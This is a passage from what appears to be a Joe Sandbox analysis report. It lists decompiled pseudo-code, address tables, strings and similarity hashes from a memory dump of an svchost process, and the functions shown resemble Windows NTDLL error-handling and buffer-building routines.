                        0x0304f79d
                        0x0304f7b0
                        0x00000000
                        0x0304f7b0
                        0x0304f79f
                        0x00000000
                        0x0304f74f
                        0x0304f74f
                        0x00000000
                        0x0304f74f

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: Actx
                        • API String ID: 0-89312691
                        • Opcode ID: 4e68067083636b66a764f7be1cbc5de9dee32dfb2adfc53eb2083f9175d61553
                        • Instruction ID: 80c6a8ce635b40cc9e286aaf21a872adf56384c362e4b53ac831330061bec32e
                        • Opcode Fuzzy Hash: 4e68067083636b66a764f7be1cbc5de9dee32dfb2adfc53eb2083f9175d61553
                        • Instruction Fuzzy Hash: E611E6F47476039BFB64CE1D8B9073BB2D9AB85264F28493AE461CB791D77CDA018740
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030D8DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                        Download Yara Rule
                        C-Code - Quality: 71%
                        			E030D8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x3100d50);
				E0307D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E030B5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0307DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0307DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0307D130(_t34, _t39, _t40);
			}





                        0x030d8df1
                        0x030d8df1
                        0x030d8df1
                        0x030d8df1
                        0x030d8df1
                        0x030d8df1
                        0x030d8df3
                        0x030d8df8
                        0x030d8dfd
                        0x030d8e00
                        0x030d8e0e
                        0x030d8e2a
                        0x030d8e36
                        0x030d8e38
                        0x030d8e3c
                        0x030d8e46
                        0x030d8e46
                        0x030d8e36
                        0x030d8e50
                        0x030d8e56
                        0x030d8e59
                        0x030d8e5c
                        0x030d8e60
                        0x030d8e67
                        0x030d8e6d
                        0x030d8e73
                        0x030d8e74
                        0x030d8eb1
                        0x030d8ebd

                        Strings
                        • Critical error detected %lx, xrefs: 030D8E21
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: Critical error detected %lx
                        • API String ID: 0-802127002
                        • Opcode ID: 7c7b01db318d75df2b8931961474f5d6a8e2bff3054b401e330747eef367486e
                        • Instruction ID: 8cfd9dc3ec84af4a17b61853a876ab2d1acd62cf61addf538963ff24d960241b
                        • Opcode Fuzzy Hash: 7c7b01db318d75df2b8931961474f5d6a8e2bff3054b401e330747eef367486e
                        • Instruction Fuzzy Hash: A9113575D56348EBDB25DFA889057DDBBF0AB04315F24825ED429AB282C3744602CF19
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030BFF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                        Download Yara Rule
                        Strings
                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 030BFF60
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                        • API String ID: 0-1911121157
                        • Opcode ID: 6a575698182a759ac554ea9de252923325c903417a9ee52cb8e9eef4d995fbfa
                        • Instruction ID: 04c68635a45f2d0ac4bba42656fe5aff70d155b9d9ce0a8f89bb3e678a13a433
                        • Opcode Fuzzy Hash: 6a575698182a759ac554ea9de252923325c903417a9ee52cb8e9eef4d995fbfa
                        • Instruction Fuzzy Hash: 06110075912245EFCB12EF50CD48FD9BBF1FF49704F188454E0086B2A1C7399990CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030F5BA5 Relevance: .6, Instructions: 592COMMON
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E030F5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x3101178);
				E0307D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E030F4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0306D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E030F5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x31160e8;
								if( *0x31160e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x31160e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E03069710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E03066DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0306F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0306F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0306F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0306FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0306FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0306F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0306F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E030F4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0307D130(_t427, _t494, _t511);
				}
			}










































































                        0x030f5ba5
                        0x030f5baa
                        0x030f5baf
                        0x030f5bb4
                        0x030f5bb6
                        0x030f5bbc
                        0x030f5bbe
                        0x030f5bc4
                        0x030f5bcd
                        0x030f5bd3
                        0x030f5bd6
                        0x030f5bdc
                        0x030f5be0
                        0x030f5be3
                        0x030f5beb
                        0x030f5bf2
                        0x030f5bf8
                        0x030f5bfe
                        0x030f5c04
                        0x030f5c0e
                        0x030f5c18
                        0x030f5c1f
                        0x030f5c25
                        0x030f5c2a
                        0x030f5c2c
                        0x030f5c32
                        0x030f5c3a
                        0x030f5c3f
                        0x030f5c42
                        0x030f5c48
                        0x030f5c5b
                        0x030f5c5b
                        0x030f5c2c
                        0x030f5cb7
                        0x030f5cb9
                        0x030f5cbf
                        0x030f5cc2
                        0x030f5cca
                        0x030f5ccb
                        0x030f5ccb
                        0x030f5cd1
                        0x030f5cd7
                        0x030f5cda
                        0x030f5ce1
                        0x030f5ce4
                        0x030f5ce7
                        0x030f5ced
                        0x030f5cf3
                        0x030f5cf9
                        0x030f5cff
                        0x030f5d08
                        0x030f5d0a
                        0x030f5d0e
                        0x030f5d10
                        0x00000000
                        0x00000000
                        0x030f5d16
                        0x030f5d1a
                        0x00000000
                        0x00000000
                        0x030f5d20
                        0x030f5d22
                        0x030f5d25
                        0x030f5d2f
                        0x030f5d2f
                        0x030f5d33
                        0x030f5d3d
                        0x030f5d49
                        0x030f5d4b
                        0x00000000
                        0x00000000
                        0x030f5d5a
                        0x030f5d5d
                        0x030f5d60
                        0x00000000
                        0x00000000
                        0x030f5d66
                        0x030f5d69
                        0x00000000
                        0x00000000
                        0x030f5d6f
                        0x030f5d6f
                        0x030f5d73
                        0x030f5d79
                        0x030f5d7f
                        0x030f5d86
                        0x030f5d95
                        0x030f5d98
                        0x030f5dba
                        0x030f5dcb
                        0x030f5dce
                        0x030f5dd3
                        0x030f5dd6
                        0x030f5dd8
                        0x030f5de6
                        0x030f5dec
                        0x030f5dee
                        0x030f5df1
                        0x030f5df3
                        0x030f635a
                        0x030f635a
                        0x00000000
                        0x030f635a
                        0x030f5dfe
                        0x030f5e02
                        0x030f5e05
                        0x030f5e07
                        0x030f5e10
                        0x030f5e13
                        0x030f5e1b
                        0x030f5e1c
                        0x030f5e21
                        0x030f5e22
                        0x030f5e23
                        0x030f5e25
                        0x030f5e2a
                        0x030f5e2c
                        0x030f5e2e
                        0x030f5e36
                        0x030f5e39
                        0x030f5e42
                        0x030f5e47
                        0x030f5e4d
                        0x030f5e54
                        0x030f5e54
                        0x030f5e54
                        0x030f5e2e
                        0x030f5e5c
                        0x030f5e5f
                        0x030f5e62
                        0x030f5e64
                        0x030f5e6b
                        0x030f5e70
                        0x030f5e7a
                        0x030f5e7a
                        0x030f5e7a
                        0x030f5e6b
                        0x030f5e7e
                        0x030f5e7f
                        0x030f5e7f
                        0x030f5e81
                        0x030f5e87
                        0x030f5e8b
                        0x030f5e8c
                        0x030f5e8c
                        0x030f5e8c
                        0x030f5e9a
                        0x030f5e9c
                        0x030f5ea2
                        0x030f5ea6
                        0x030f5f50
                        0x030f5f50
                        0x030f5f57
                        0x030f5f66
                        0x030f5f66
                        0x030f5f66
                        0x030f5f68
                        0x030f5f6a
                        0x030f63d0
                        0x00000000
                        0x030f5f70
                        0x030f5f70
                        0x030f5f91
                        0x030f5f9c
                        0x030f5f9e
                        0x030f5fa4
                        0x030f5fa6
                        0x030f638c
                        0x030f6392
                        0x030f63a1
                        0x030f63a7
                        0x030f63af
                        0x030f63af
                        0x030f63bd
                        0x030f63d8
                        0x00000000
                        0x030f63d8
                        0x030f5fac
                        0x030f5fb2
                        0x030f5fb4
                        0x030f5fbd
                        0x030f5fc6
                        0x030f5fce
                        0x030f5fd4
                        0x030f5fdc
                        0x030f5fec
                        0x030f5fed
                        0x030f5fee
                        0x030f5fef
                        0x030f5ff9
                        0x030f5ffa
                        0x030f5ffb
                        0x030f5ffc
                        0x030f6000
                        0x030f6004
                        0x030f6012
                        0x030f6012
                        0x030f6018
                        0x030f6019
                        0x030f601a
                        0x030f601b
                        0x030f601c
                        0x030f6020
